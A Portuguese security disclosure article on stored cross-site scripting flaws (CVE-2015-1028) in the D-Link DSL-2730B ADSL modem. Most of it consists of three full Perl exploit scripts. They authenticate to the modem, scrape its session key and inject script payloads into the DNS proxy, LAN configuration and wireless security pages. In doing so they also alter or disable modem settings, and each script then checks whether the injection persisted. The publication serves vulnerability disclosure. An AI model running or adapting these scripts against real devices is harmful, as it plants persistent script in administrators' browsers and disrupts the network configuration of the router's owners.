Ao analisarmos a segurança do modem D-Link DSL-2730B, notamos a presença de algumas vulnerabilidades de Cross Site Scripting, ou mais conhecido como XSS Injection, todas as falhas permitem o modem armazenar códigos maliciosos, podendo originar um ataque externo à rede da vítima, neste caso a vítima mais comum seria o administrador do modem, este é um pequeno artigo que tem por objetivo a exposição do código de exploração destas falhas.
Descrição da plataforma segundo o website do fabricante
O DSL-2730B, Modem banda larga ADSL com Roteador Wireless integrado da D-Link é ideal para usuários que obtêm a sua conexão à Internet através da linha telefônica. Este roteador conecta-se diretamente à linha telefônica, sem a necessidade de um modem ADSL. Por também ser um roteador Wireless, o DSL-2730B conecta um grupo de usuários à Internet, permitindo que computadores em uma casa ou um escritório compartilhem uma conexão de alta velocidade ADSL 2/2+. Ele fornece conexão wireless para computadores e dispositivos sem fio. Possui quatro portas Ethernet, proteção de firewall e QoS para downloads ou uploads eficientes e seguros de fotos, arquivos de música, vídeos e e-mail através da Internet.
A falha de segurança
# Software: D-Link DSL-2730B
# Versão: GE 1.01
# Empresa: D-Link
# Website:
# Vulnerabilidade: Múltiplos Cross Site Scripting Armazenado (XSS Injection Stored)
# CVE: CVE-2015-1028
# Autor: Mauricio Corrêa
# POC: Video
dnsProxy.cmd exploit (DNS Proxy Configuration Panel)
#!/usr/bin/perl # # Date dd-mm-aaaa: 11-11-2014 # Exploit for D-Link DSL-2730B # Cross Site Scripting (XSS Injection) Stored in dnsProxy.cmd # Developed by Mauricio Corrêa # XLabs Information Security # WebSite: # # CAUTION! # This exploit enable some features of the modem, # forcing the administrator of the device, accessing the page to reconfigure the modem again, # occurring script execution in the browser of internal network users. # # Use with caution! # Use at your own risk! # use strict; use warnings; use diagnostics; use LWP::UserAgent; use HTTP::Request; use URI::Escape; my $ip = $ARGV[0]; my $user = $ARGV[1]; my $pass = $ARGV[2]; if (@ARGV != 3){ print "\n"; print "XLabs Information Security\n"; print "Exploit for POC D-Link DSL-2730B Stored XSS Injection in dnsProxy.cmd\n"; print "Developed by Mauricio Correa\n"; print "Contact: mauricio\\n"; print "Usage: perl $0 http:\/\/host_ip\/ user pass\n"; }else{ $ip = $1 if($ip=~/(.*)\/$/); print "XLabs Information Security\n"; print "Exploit for POC D-Link DSL-2730B Stored XSS Injection in dnsProxy.cmd\n"; print "Developed by Mauricio Correa\n"; print "Contact: mauricio\\n"; print "[+] Exploring $ip\/ ...\n"; my $payload = "%27;alert(%27XLabsSec%27);\/\/"; my $ua = new LWP::UserAgent; my $hdrs = new HTTP::Headers( Accept => 'text/plain', UserAgent => "XLabs Security Exploit Browser/1.0" ); $hdrs->authorization_basic($user, $pass); chomp($ip); print "[+] Preparing...\n"; my $url = "$ip/dnsProxy.cmd?enblDproxy=1&hostname=Broadcom&domainname=A"; my $req = new HTTP::Request("GET",$url,$hdrs); print "[+] Prepared!\n"; print "[+] Requesting...\n"; my $resp = $ua->request($req); if ($resp->is_success){ print "[+] Successfully Requested!\n"; my $resposta = $resp->as_string; print "[+] Obtain session key...\n"; my $token = ""; if($resposta =~ /sessionKey=(.*)\';/){ $token = $1; print "[+] Session key found: $token\n"; }else{ print "[-] Session key not found!\n"; exit; } print "[+] Preparing exploit...\n"; my $url_and_xpl = "$ip/dnsProxy.cmd?enblDproxy=1&hostname=Broadcom&domainname=XSS$payload&sessionKey=$token"; $req = new HTTP::Request("GET",$url_and_xpl,$hdrs); print "[+] Prepared!\n"; print "[+] Exploiting...\n"; my $resp2 = $ua->request($req); if ($resp2->is_success){ my $resultado = $resp2->as_string; if(index($resultado, uri_unescape($payload)) != -1){ print "[+] Successfully Exploited!"; }else{ print "[-] Not Exploited!"; } } }else { print "[-] Ops!\n"; print $resp->message; } }
lancfg2get.cgi Exploit (Lan Configuration Panel)
#!/usr/bin/perl # # Date dd-mm-aaaa: 11-11-2014 # Exploit for D-Link DSL-2730B # Cross Site Scripting (XSS Injection) Stored in lancfg2get.cgi # Developed by Mauricio Corrêa # XLabs Information Security # WebSite: # # CAUTION! # This exploit disables some features of the modem, # forcing the administrator of the device, accessing the page to reconfigure the modem again, # occurring script execution in the browser of internal network users. # # Use with caution! # Use at your own risk! # use strict; use warnings; use diagnostics; use LWP::UserAgent; use HTTP::Request; use URI::Escape; my $ip = $ARGV[0]; my $user = $ARGV[1]; my $pass = $ARGV[2]; if (@ARGV != 3){ print "\n"; print "XLabs Information Security\n"; print "Exploit for POC D-Link DSL-2730B Stored XSS Injection in lancfg2get.cgi\n"; print "Developed by Mauricio Correa\n"; print "Contact: mauricio\\n"; print "Usage: perl $0 http:\/\/host_ip\/ user pass\n"; }else{ $ip = $1 if($ip=~/(.*)\/$/); print "XLabs Information Security\n"; print "Exploit for POC D-Link DSL-2730B Stored XSS Injection in lancfg2get.cgi\n"; print "Developed by Mauricio Correa\n"; print "Contact: mauricio\\n"; print "[+] Exploring $ip\/ ...\n"; my $payload = "%27;alert(%27XLabsSec%27);\/\/"; my $ua = new LWP::UserAgent; my $hdrs = new HTTP::Headers( Accept => 'text/plain', UserAgent => "XLabs Security Exploit Browser/1.0" ); $hdrs->authorization_basic($user, $pass); chomp($ip); print "[+] Preparing exploit...\n"; my $url_and_xpl = "$ip/lancfg2get.cgi?brName=$payload"; my $req = new HTTP::Request("GET",$url_and_xpl,$hdrs); print "[+] Prepared!\n"; print "[+] Requesting and Exploiting...\n"; my $resp = $ua->request($req); if ($resp->is_success){ print "[+] Successfully Requested!\n"; my $url = "$ip/lancfg2.html"; $req = new HTTP::Request("GET",$url,$hdrs); print "[+] Checking that was explored...\n"; my $resp2 = $ua->request($req); if ($resp2->is_success){ my $resultado = $resp2->as_string; if(index($resultado, uri_unescape($payload)) != -1){ print "[+] Successfully Exploited!"; }else{ print "[-] Not Exploited!"; } } }else { print "[-] Ops!\n"; print $resp->message; } }
wlsecrefresh.wl & wlsecurity.wl Exploit (Wireless Security Panel and Wireless Password Viewer)
#!/usr/bin/perl # # Date dd-mm-aaaa: 11-11-2014 # Exploit for D-Link DSL-2730B # Cross Site Scripting (XSS Injection) Stored in wlsecrefresh.wl # Developed by Mauricio Corrêa # XLabs Information Security # WebSite: # # CAUTION! # This exploit disables some features of the modem, # forcing the administrator of the device, accessing the page to reconfigure the modem again, # occurring script execution in the browser of internal network users. # # Use with caution! # Use at your own risk! # use strict; use warnings; use diagnostics; use LWP::UserAgent; use HTTP::Request; use URI::Escape; my $ip = $ARGV[0]; my $user = $ARGV[1]; my $pass = $ARGV[2]; my $opt = $ARGV[3]; if (@ARGV != 4){ print "\n"; print "XLabs Information Security\n"; print "Exploit for POC D-Link DSL-2730B Stored XSS Injection in wlsecrefresh.wl\n"; print "Developed by Mauricio Correa\n"; print "Contact: mauricio\\n"; print "Usage: perl $0 http:\/\/host_ip\/ user pass option\n"; print "\n"; print "Options: 1 - Parameter: wlAuthMode \n"; print " 2 - Parameter: wl_wsc_reg \n "; print " 3 - Parameter: wl_wsc_mode \n"; print " 4 - Parameter: wlWpaPsk (Execute on click to exibe Wireless password) \n"; }else{ $ip = $1 if($ip=~/(.*)\/$/); print "XLabs Information Security\n"; print "Exploit for POC D-Link DSL-2730B Stored XSS Injection in wlsecrefresh.wl\n"; print "Developed by Mauricio Correa\n"; print "Contact: mauricio\\n"; print "[+] Exploring $ip\/ ...\n"; my $payload = "%27;alert(%27\/\/XLabsSec%27);\/\/"; my $ua = new LWP::UserAgent; my $hdrs = new HTTP::Headers( Accept => 'text/plain', UserAgent => "XLabs Security Exploit Browser/1.0" ); $hdrs->authorization_basic($user, $pass); chomp($ip); print "[+] Preparing...\n"; my $url_and_payload = ""; if($opt == 1){ $url_and_payload = "$ip/wlsecrefresh.wl?wl_wsc_mode=disabled&wl_wsc_reg=disabled&wlAuth=0&wlAuthMode=1$payload". "&wlKeyBit=0&wlPreauth=0&wlSsidIdx=0&wlSyncNvram=1&wlWep=disabled&wlWpa=&wsc_config_state=0"; }elsif($opt == 2){ $url_and_payload = "$ip/wlsecrefresh.wl?wl_wsc_mode=disabled&wl_wsc_reg=disabled$payload&wlAuth=0&wlAuthMode=997354". "&wlKeyBit=0&wlPreauth=0&wlSsidIdx=0&wlSyncNvram=1&wlWep=disabled&wlWpa=&wsc_config_state=0"; }elsif($opt == 3){ $payload = "%27;alert(%27\/\/XLabsSec%27);\/\/"; $url_and_payload = "$ip/wlsecrefresh.wl?wl_wsc_mode=disabled$payload&wl_wsc_reg=disabled&wlAuth=0&wlAuthMode=997354". "&wlKeyBit=0&wlPreauth=0&wlSsidIdx=0&wlSyncNvram=1&wlWep=disabled&wlWpa=&wsc_config_state=0"; }elsif($opt == 4){ $payload = ""; $url_and_payload = "$ip/wlsecurity.wl?wl_wsc_mode=enabled&wl_wsc_reg=disabled&wsc_config_state=0&wlAuthMode=psk%20psk2&wlAuth=0&". "wlWpaPsk=$payload&wlWpaGtkRekey=0&wlNetReauth=36000&wlWep=disabled&wlWpa=aes&wlKeyBit=0&wlPreauth=0&". "wlSsidIdx=0&wlSyncNvram=1"; }else{ print "[-] Chose one option!\n"; exit; } my $req = new HTTP::Request("GET",$url_and_payload,$hdrs); print "[+] Prepared!\n"; print "[+] Requesting...\n"; my $resp = $ua->request($req); if ($resp->is_success){ print "[+] Successfully Requested!\n"; my $resposta = $resp->as_string; print "[+] Checking for properly explored...\n"; my $url = "$ip/wlsecurity.html"; $req = new HTTP::Request("GET",$url,$hdrs); print "[+] Checking that was explored...\n"; my $resp2 = $ua->request($req); if ($resp2->is_success){ my $result = $resp2->as_string; if($opt == 4){ $payload = ""; } if(index($result, uri_unescape($payload)) != -1){ print "[+] Successfully Exploited!"; }else{ print "[-] Not Exploited!"; } } }else { print "[-] Ops!\n"; print $resp->message; } }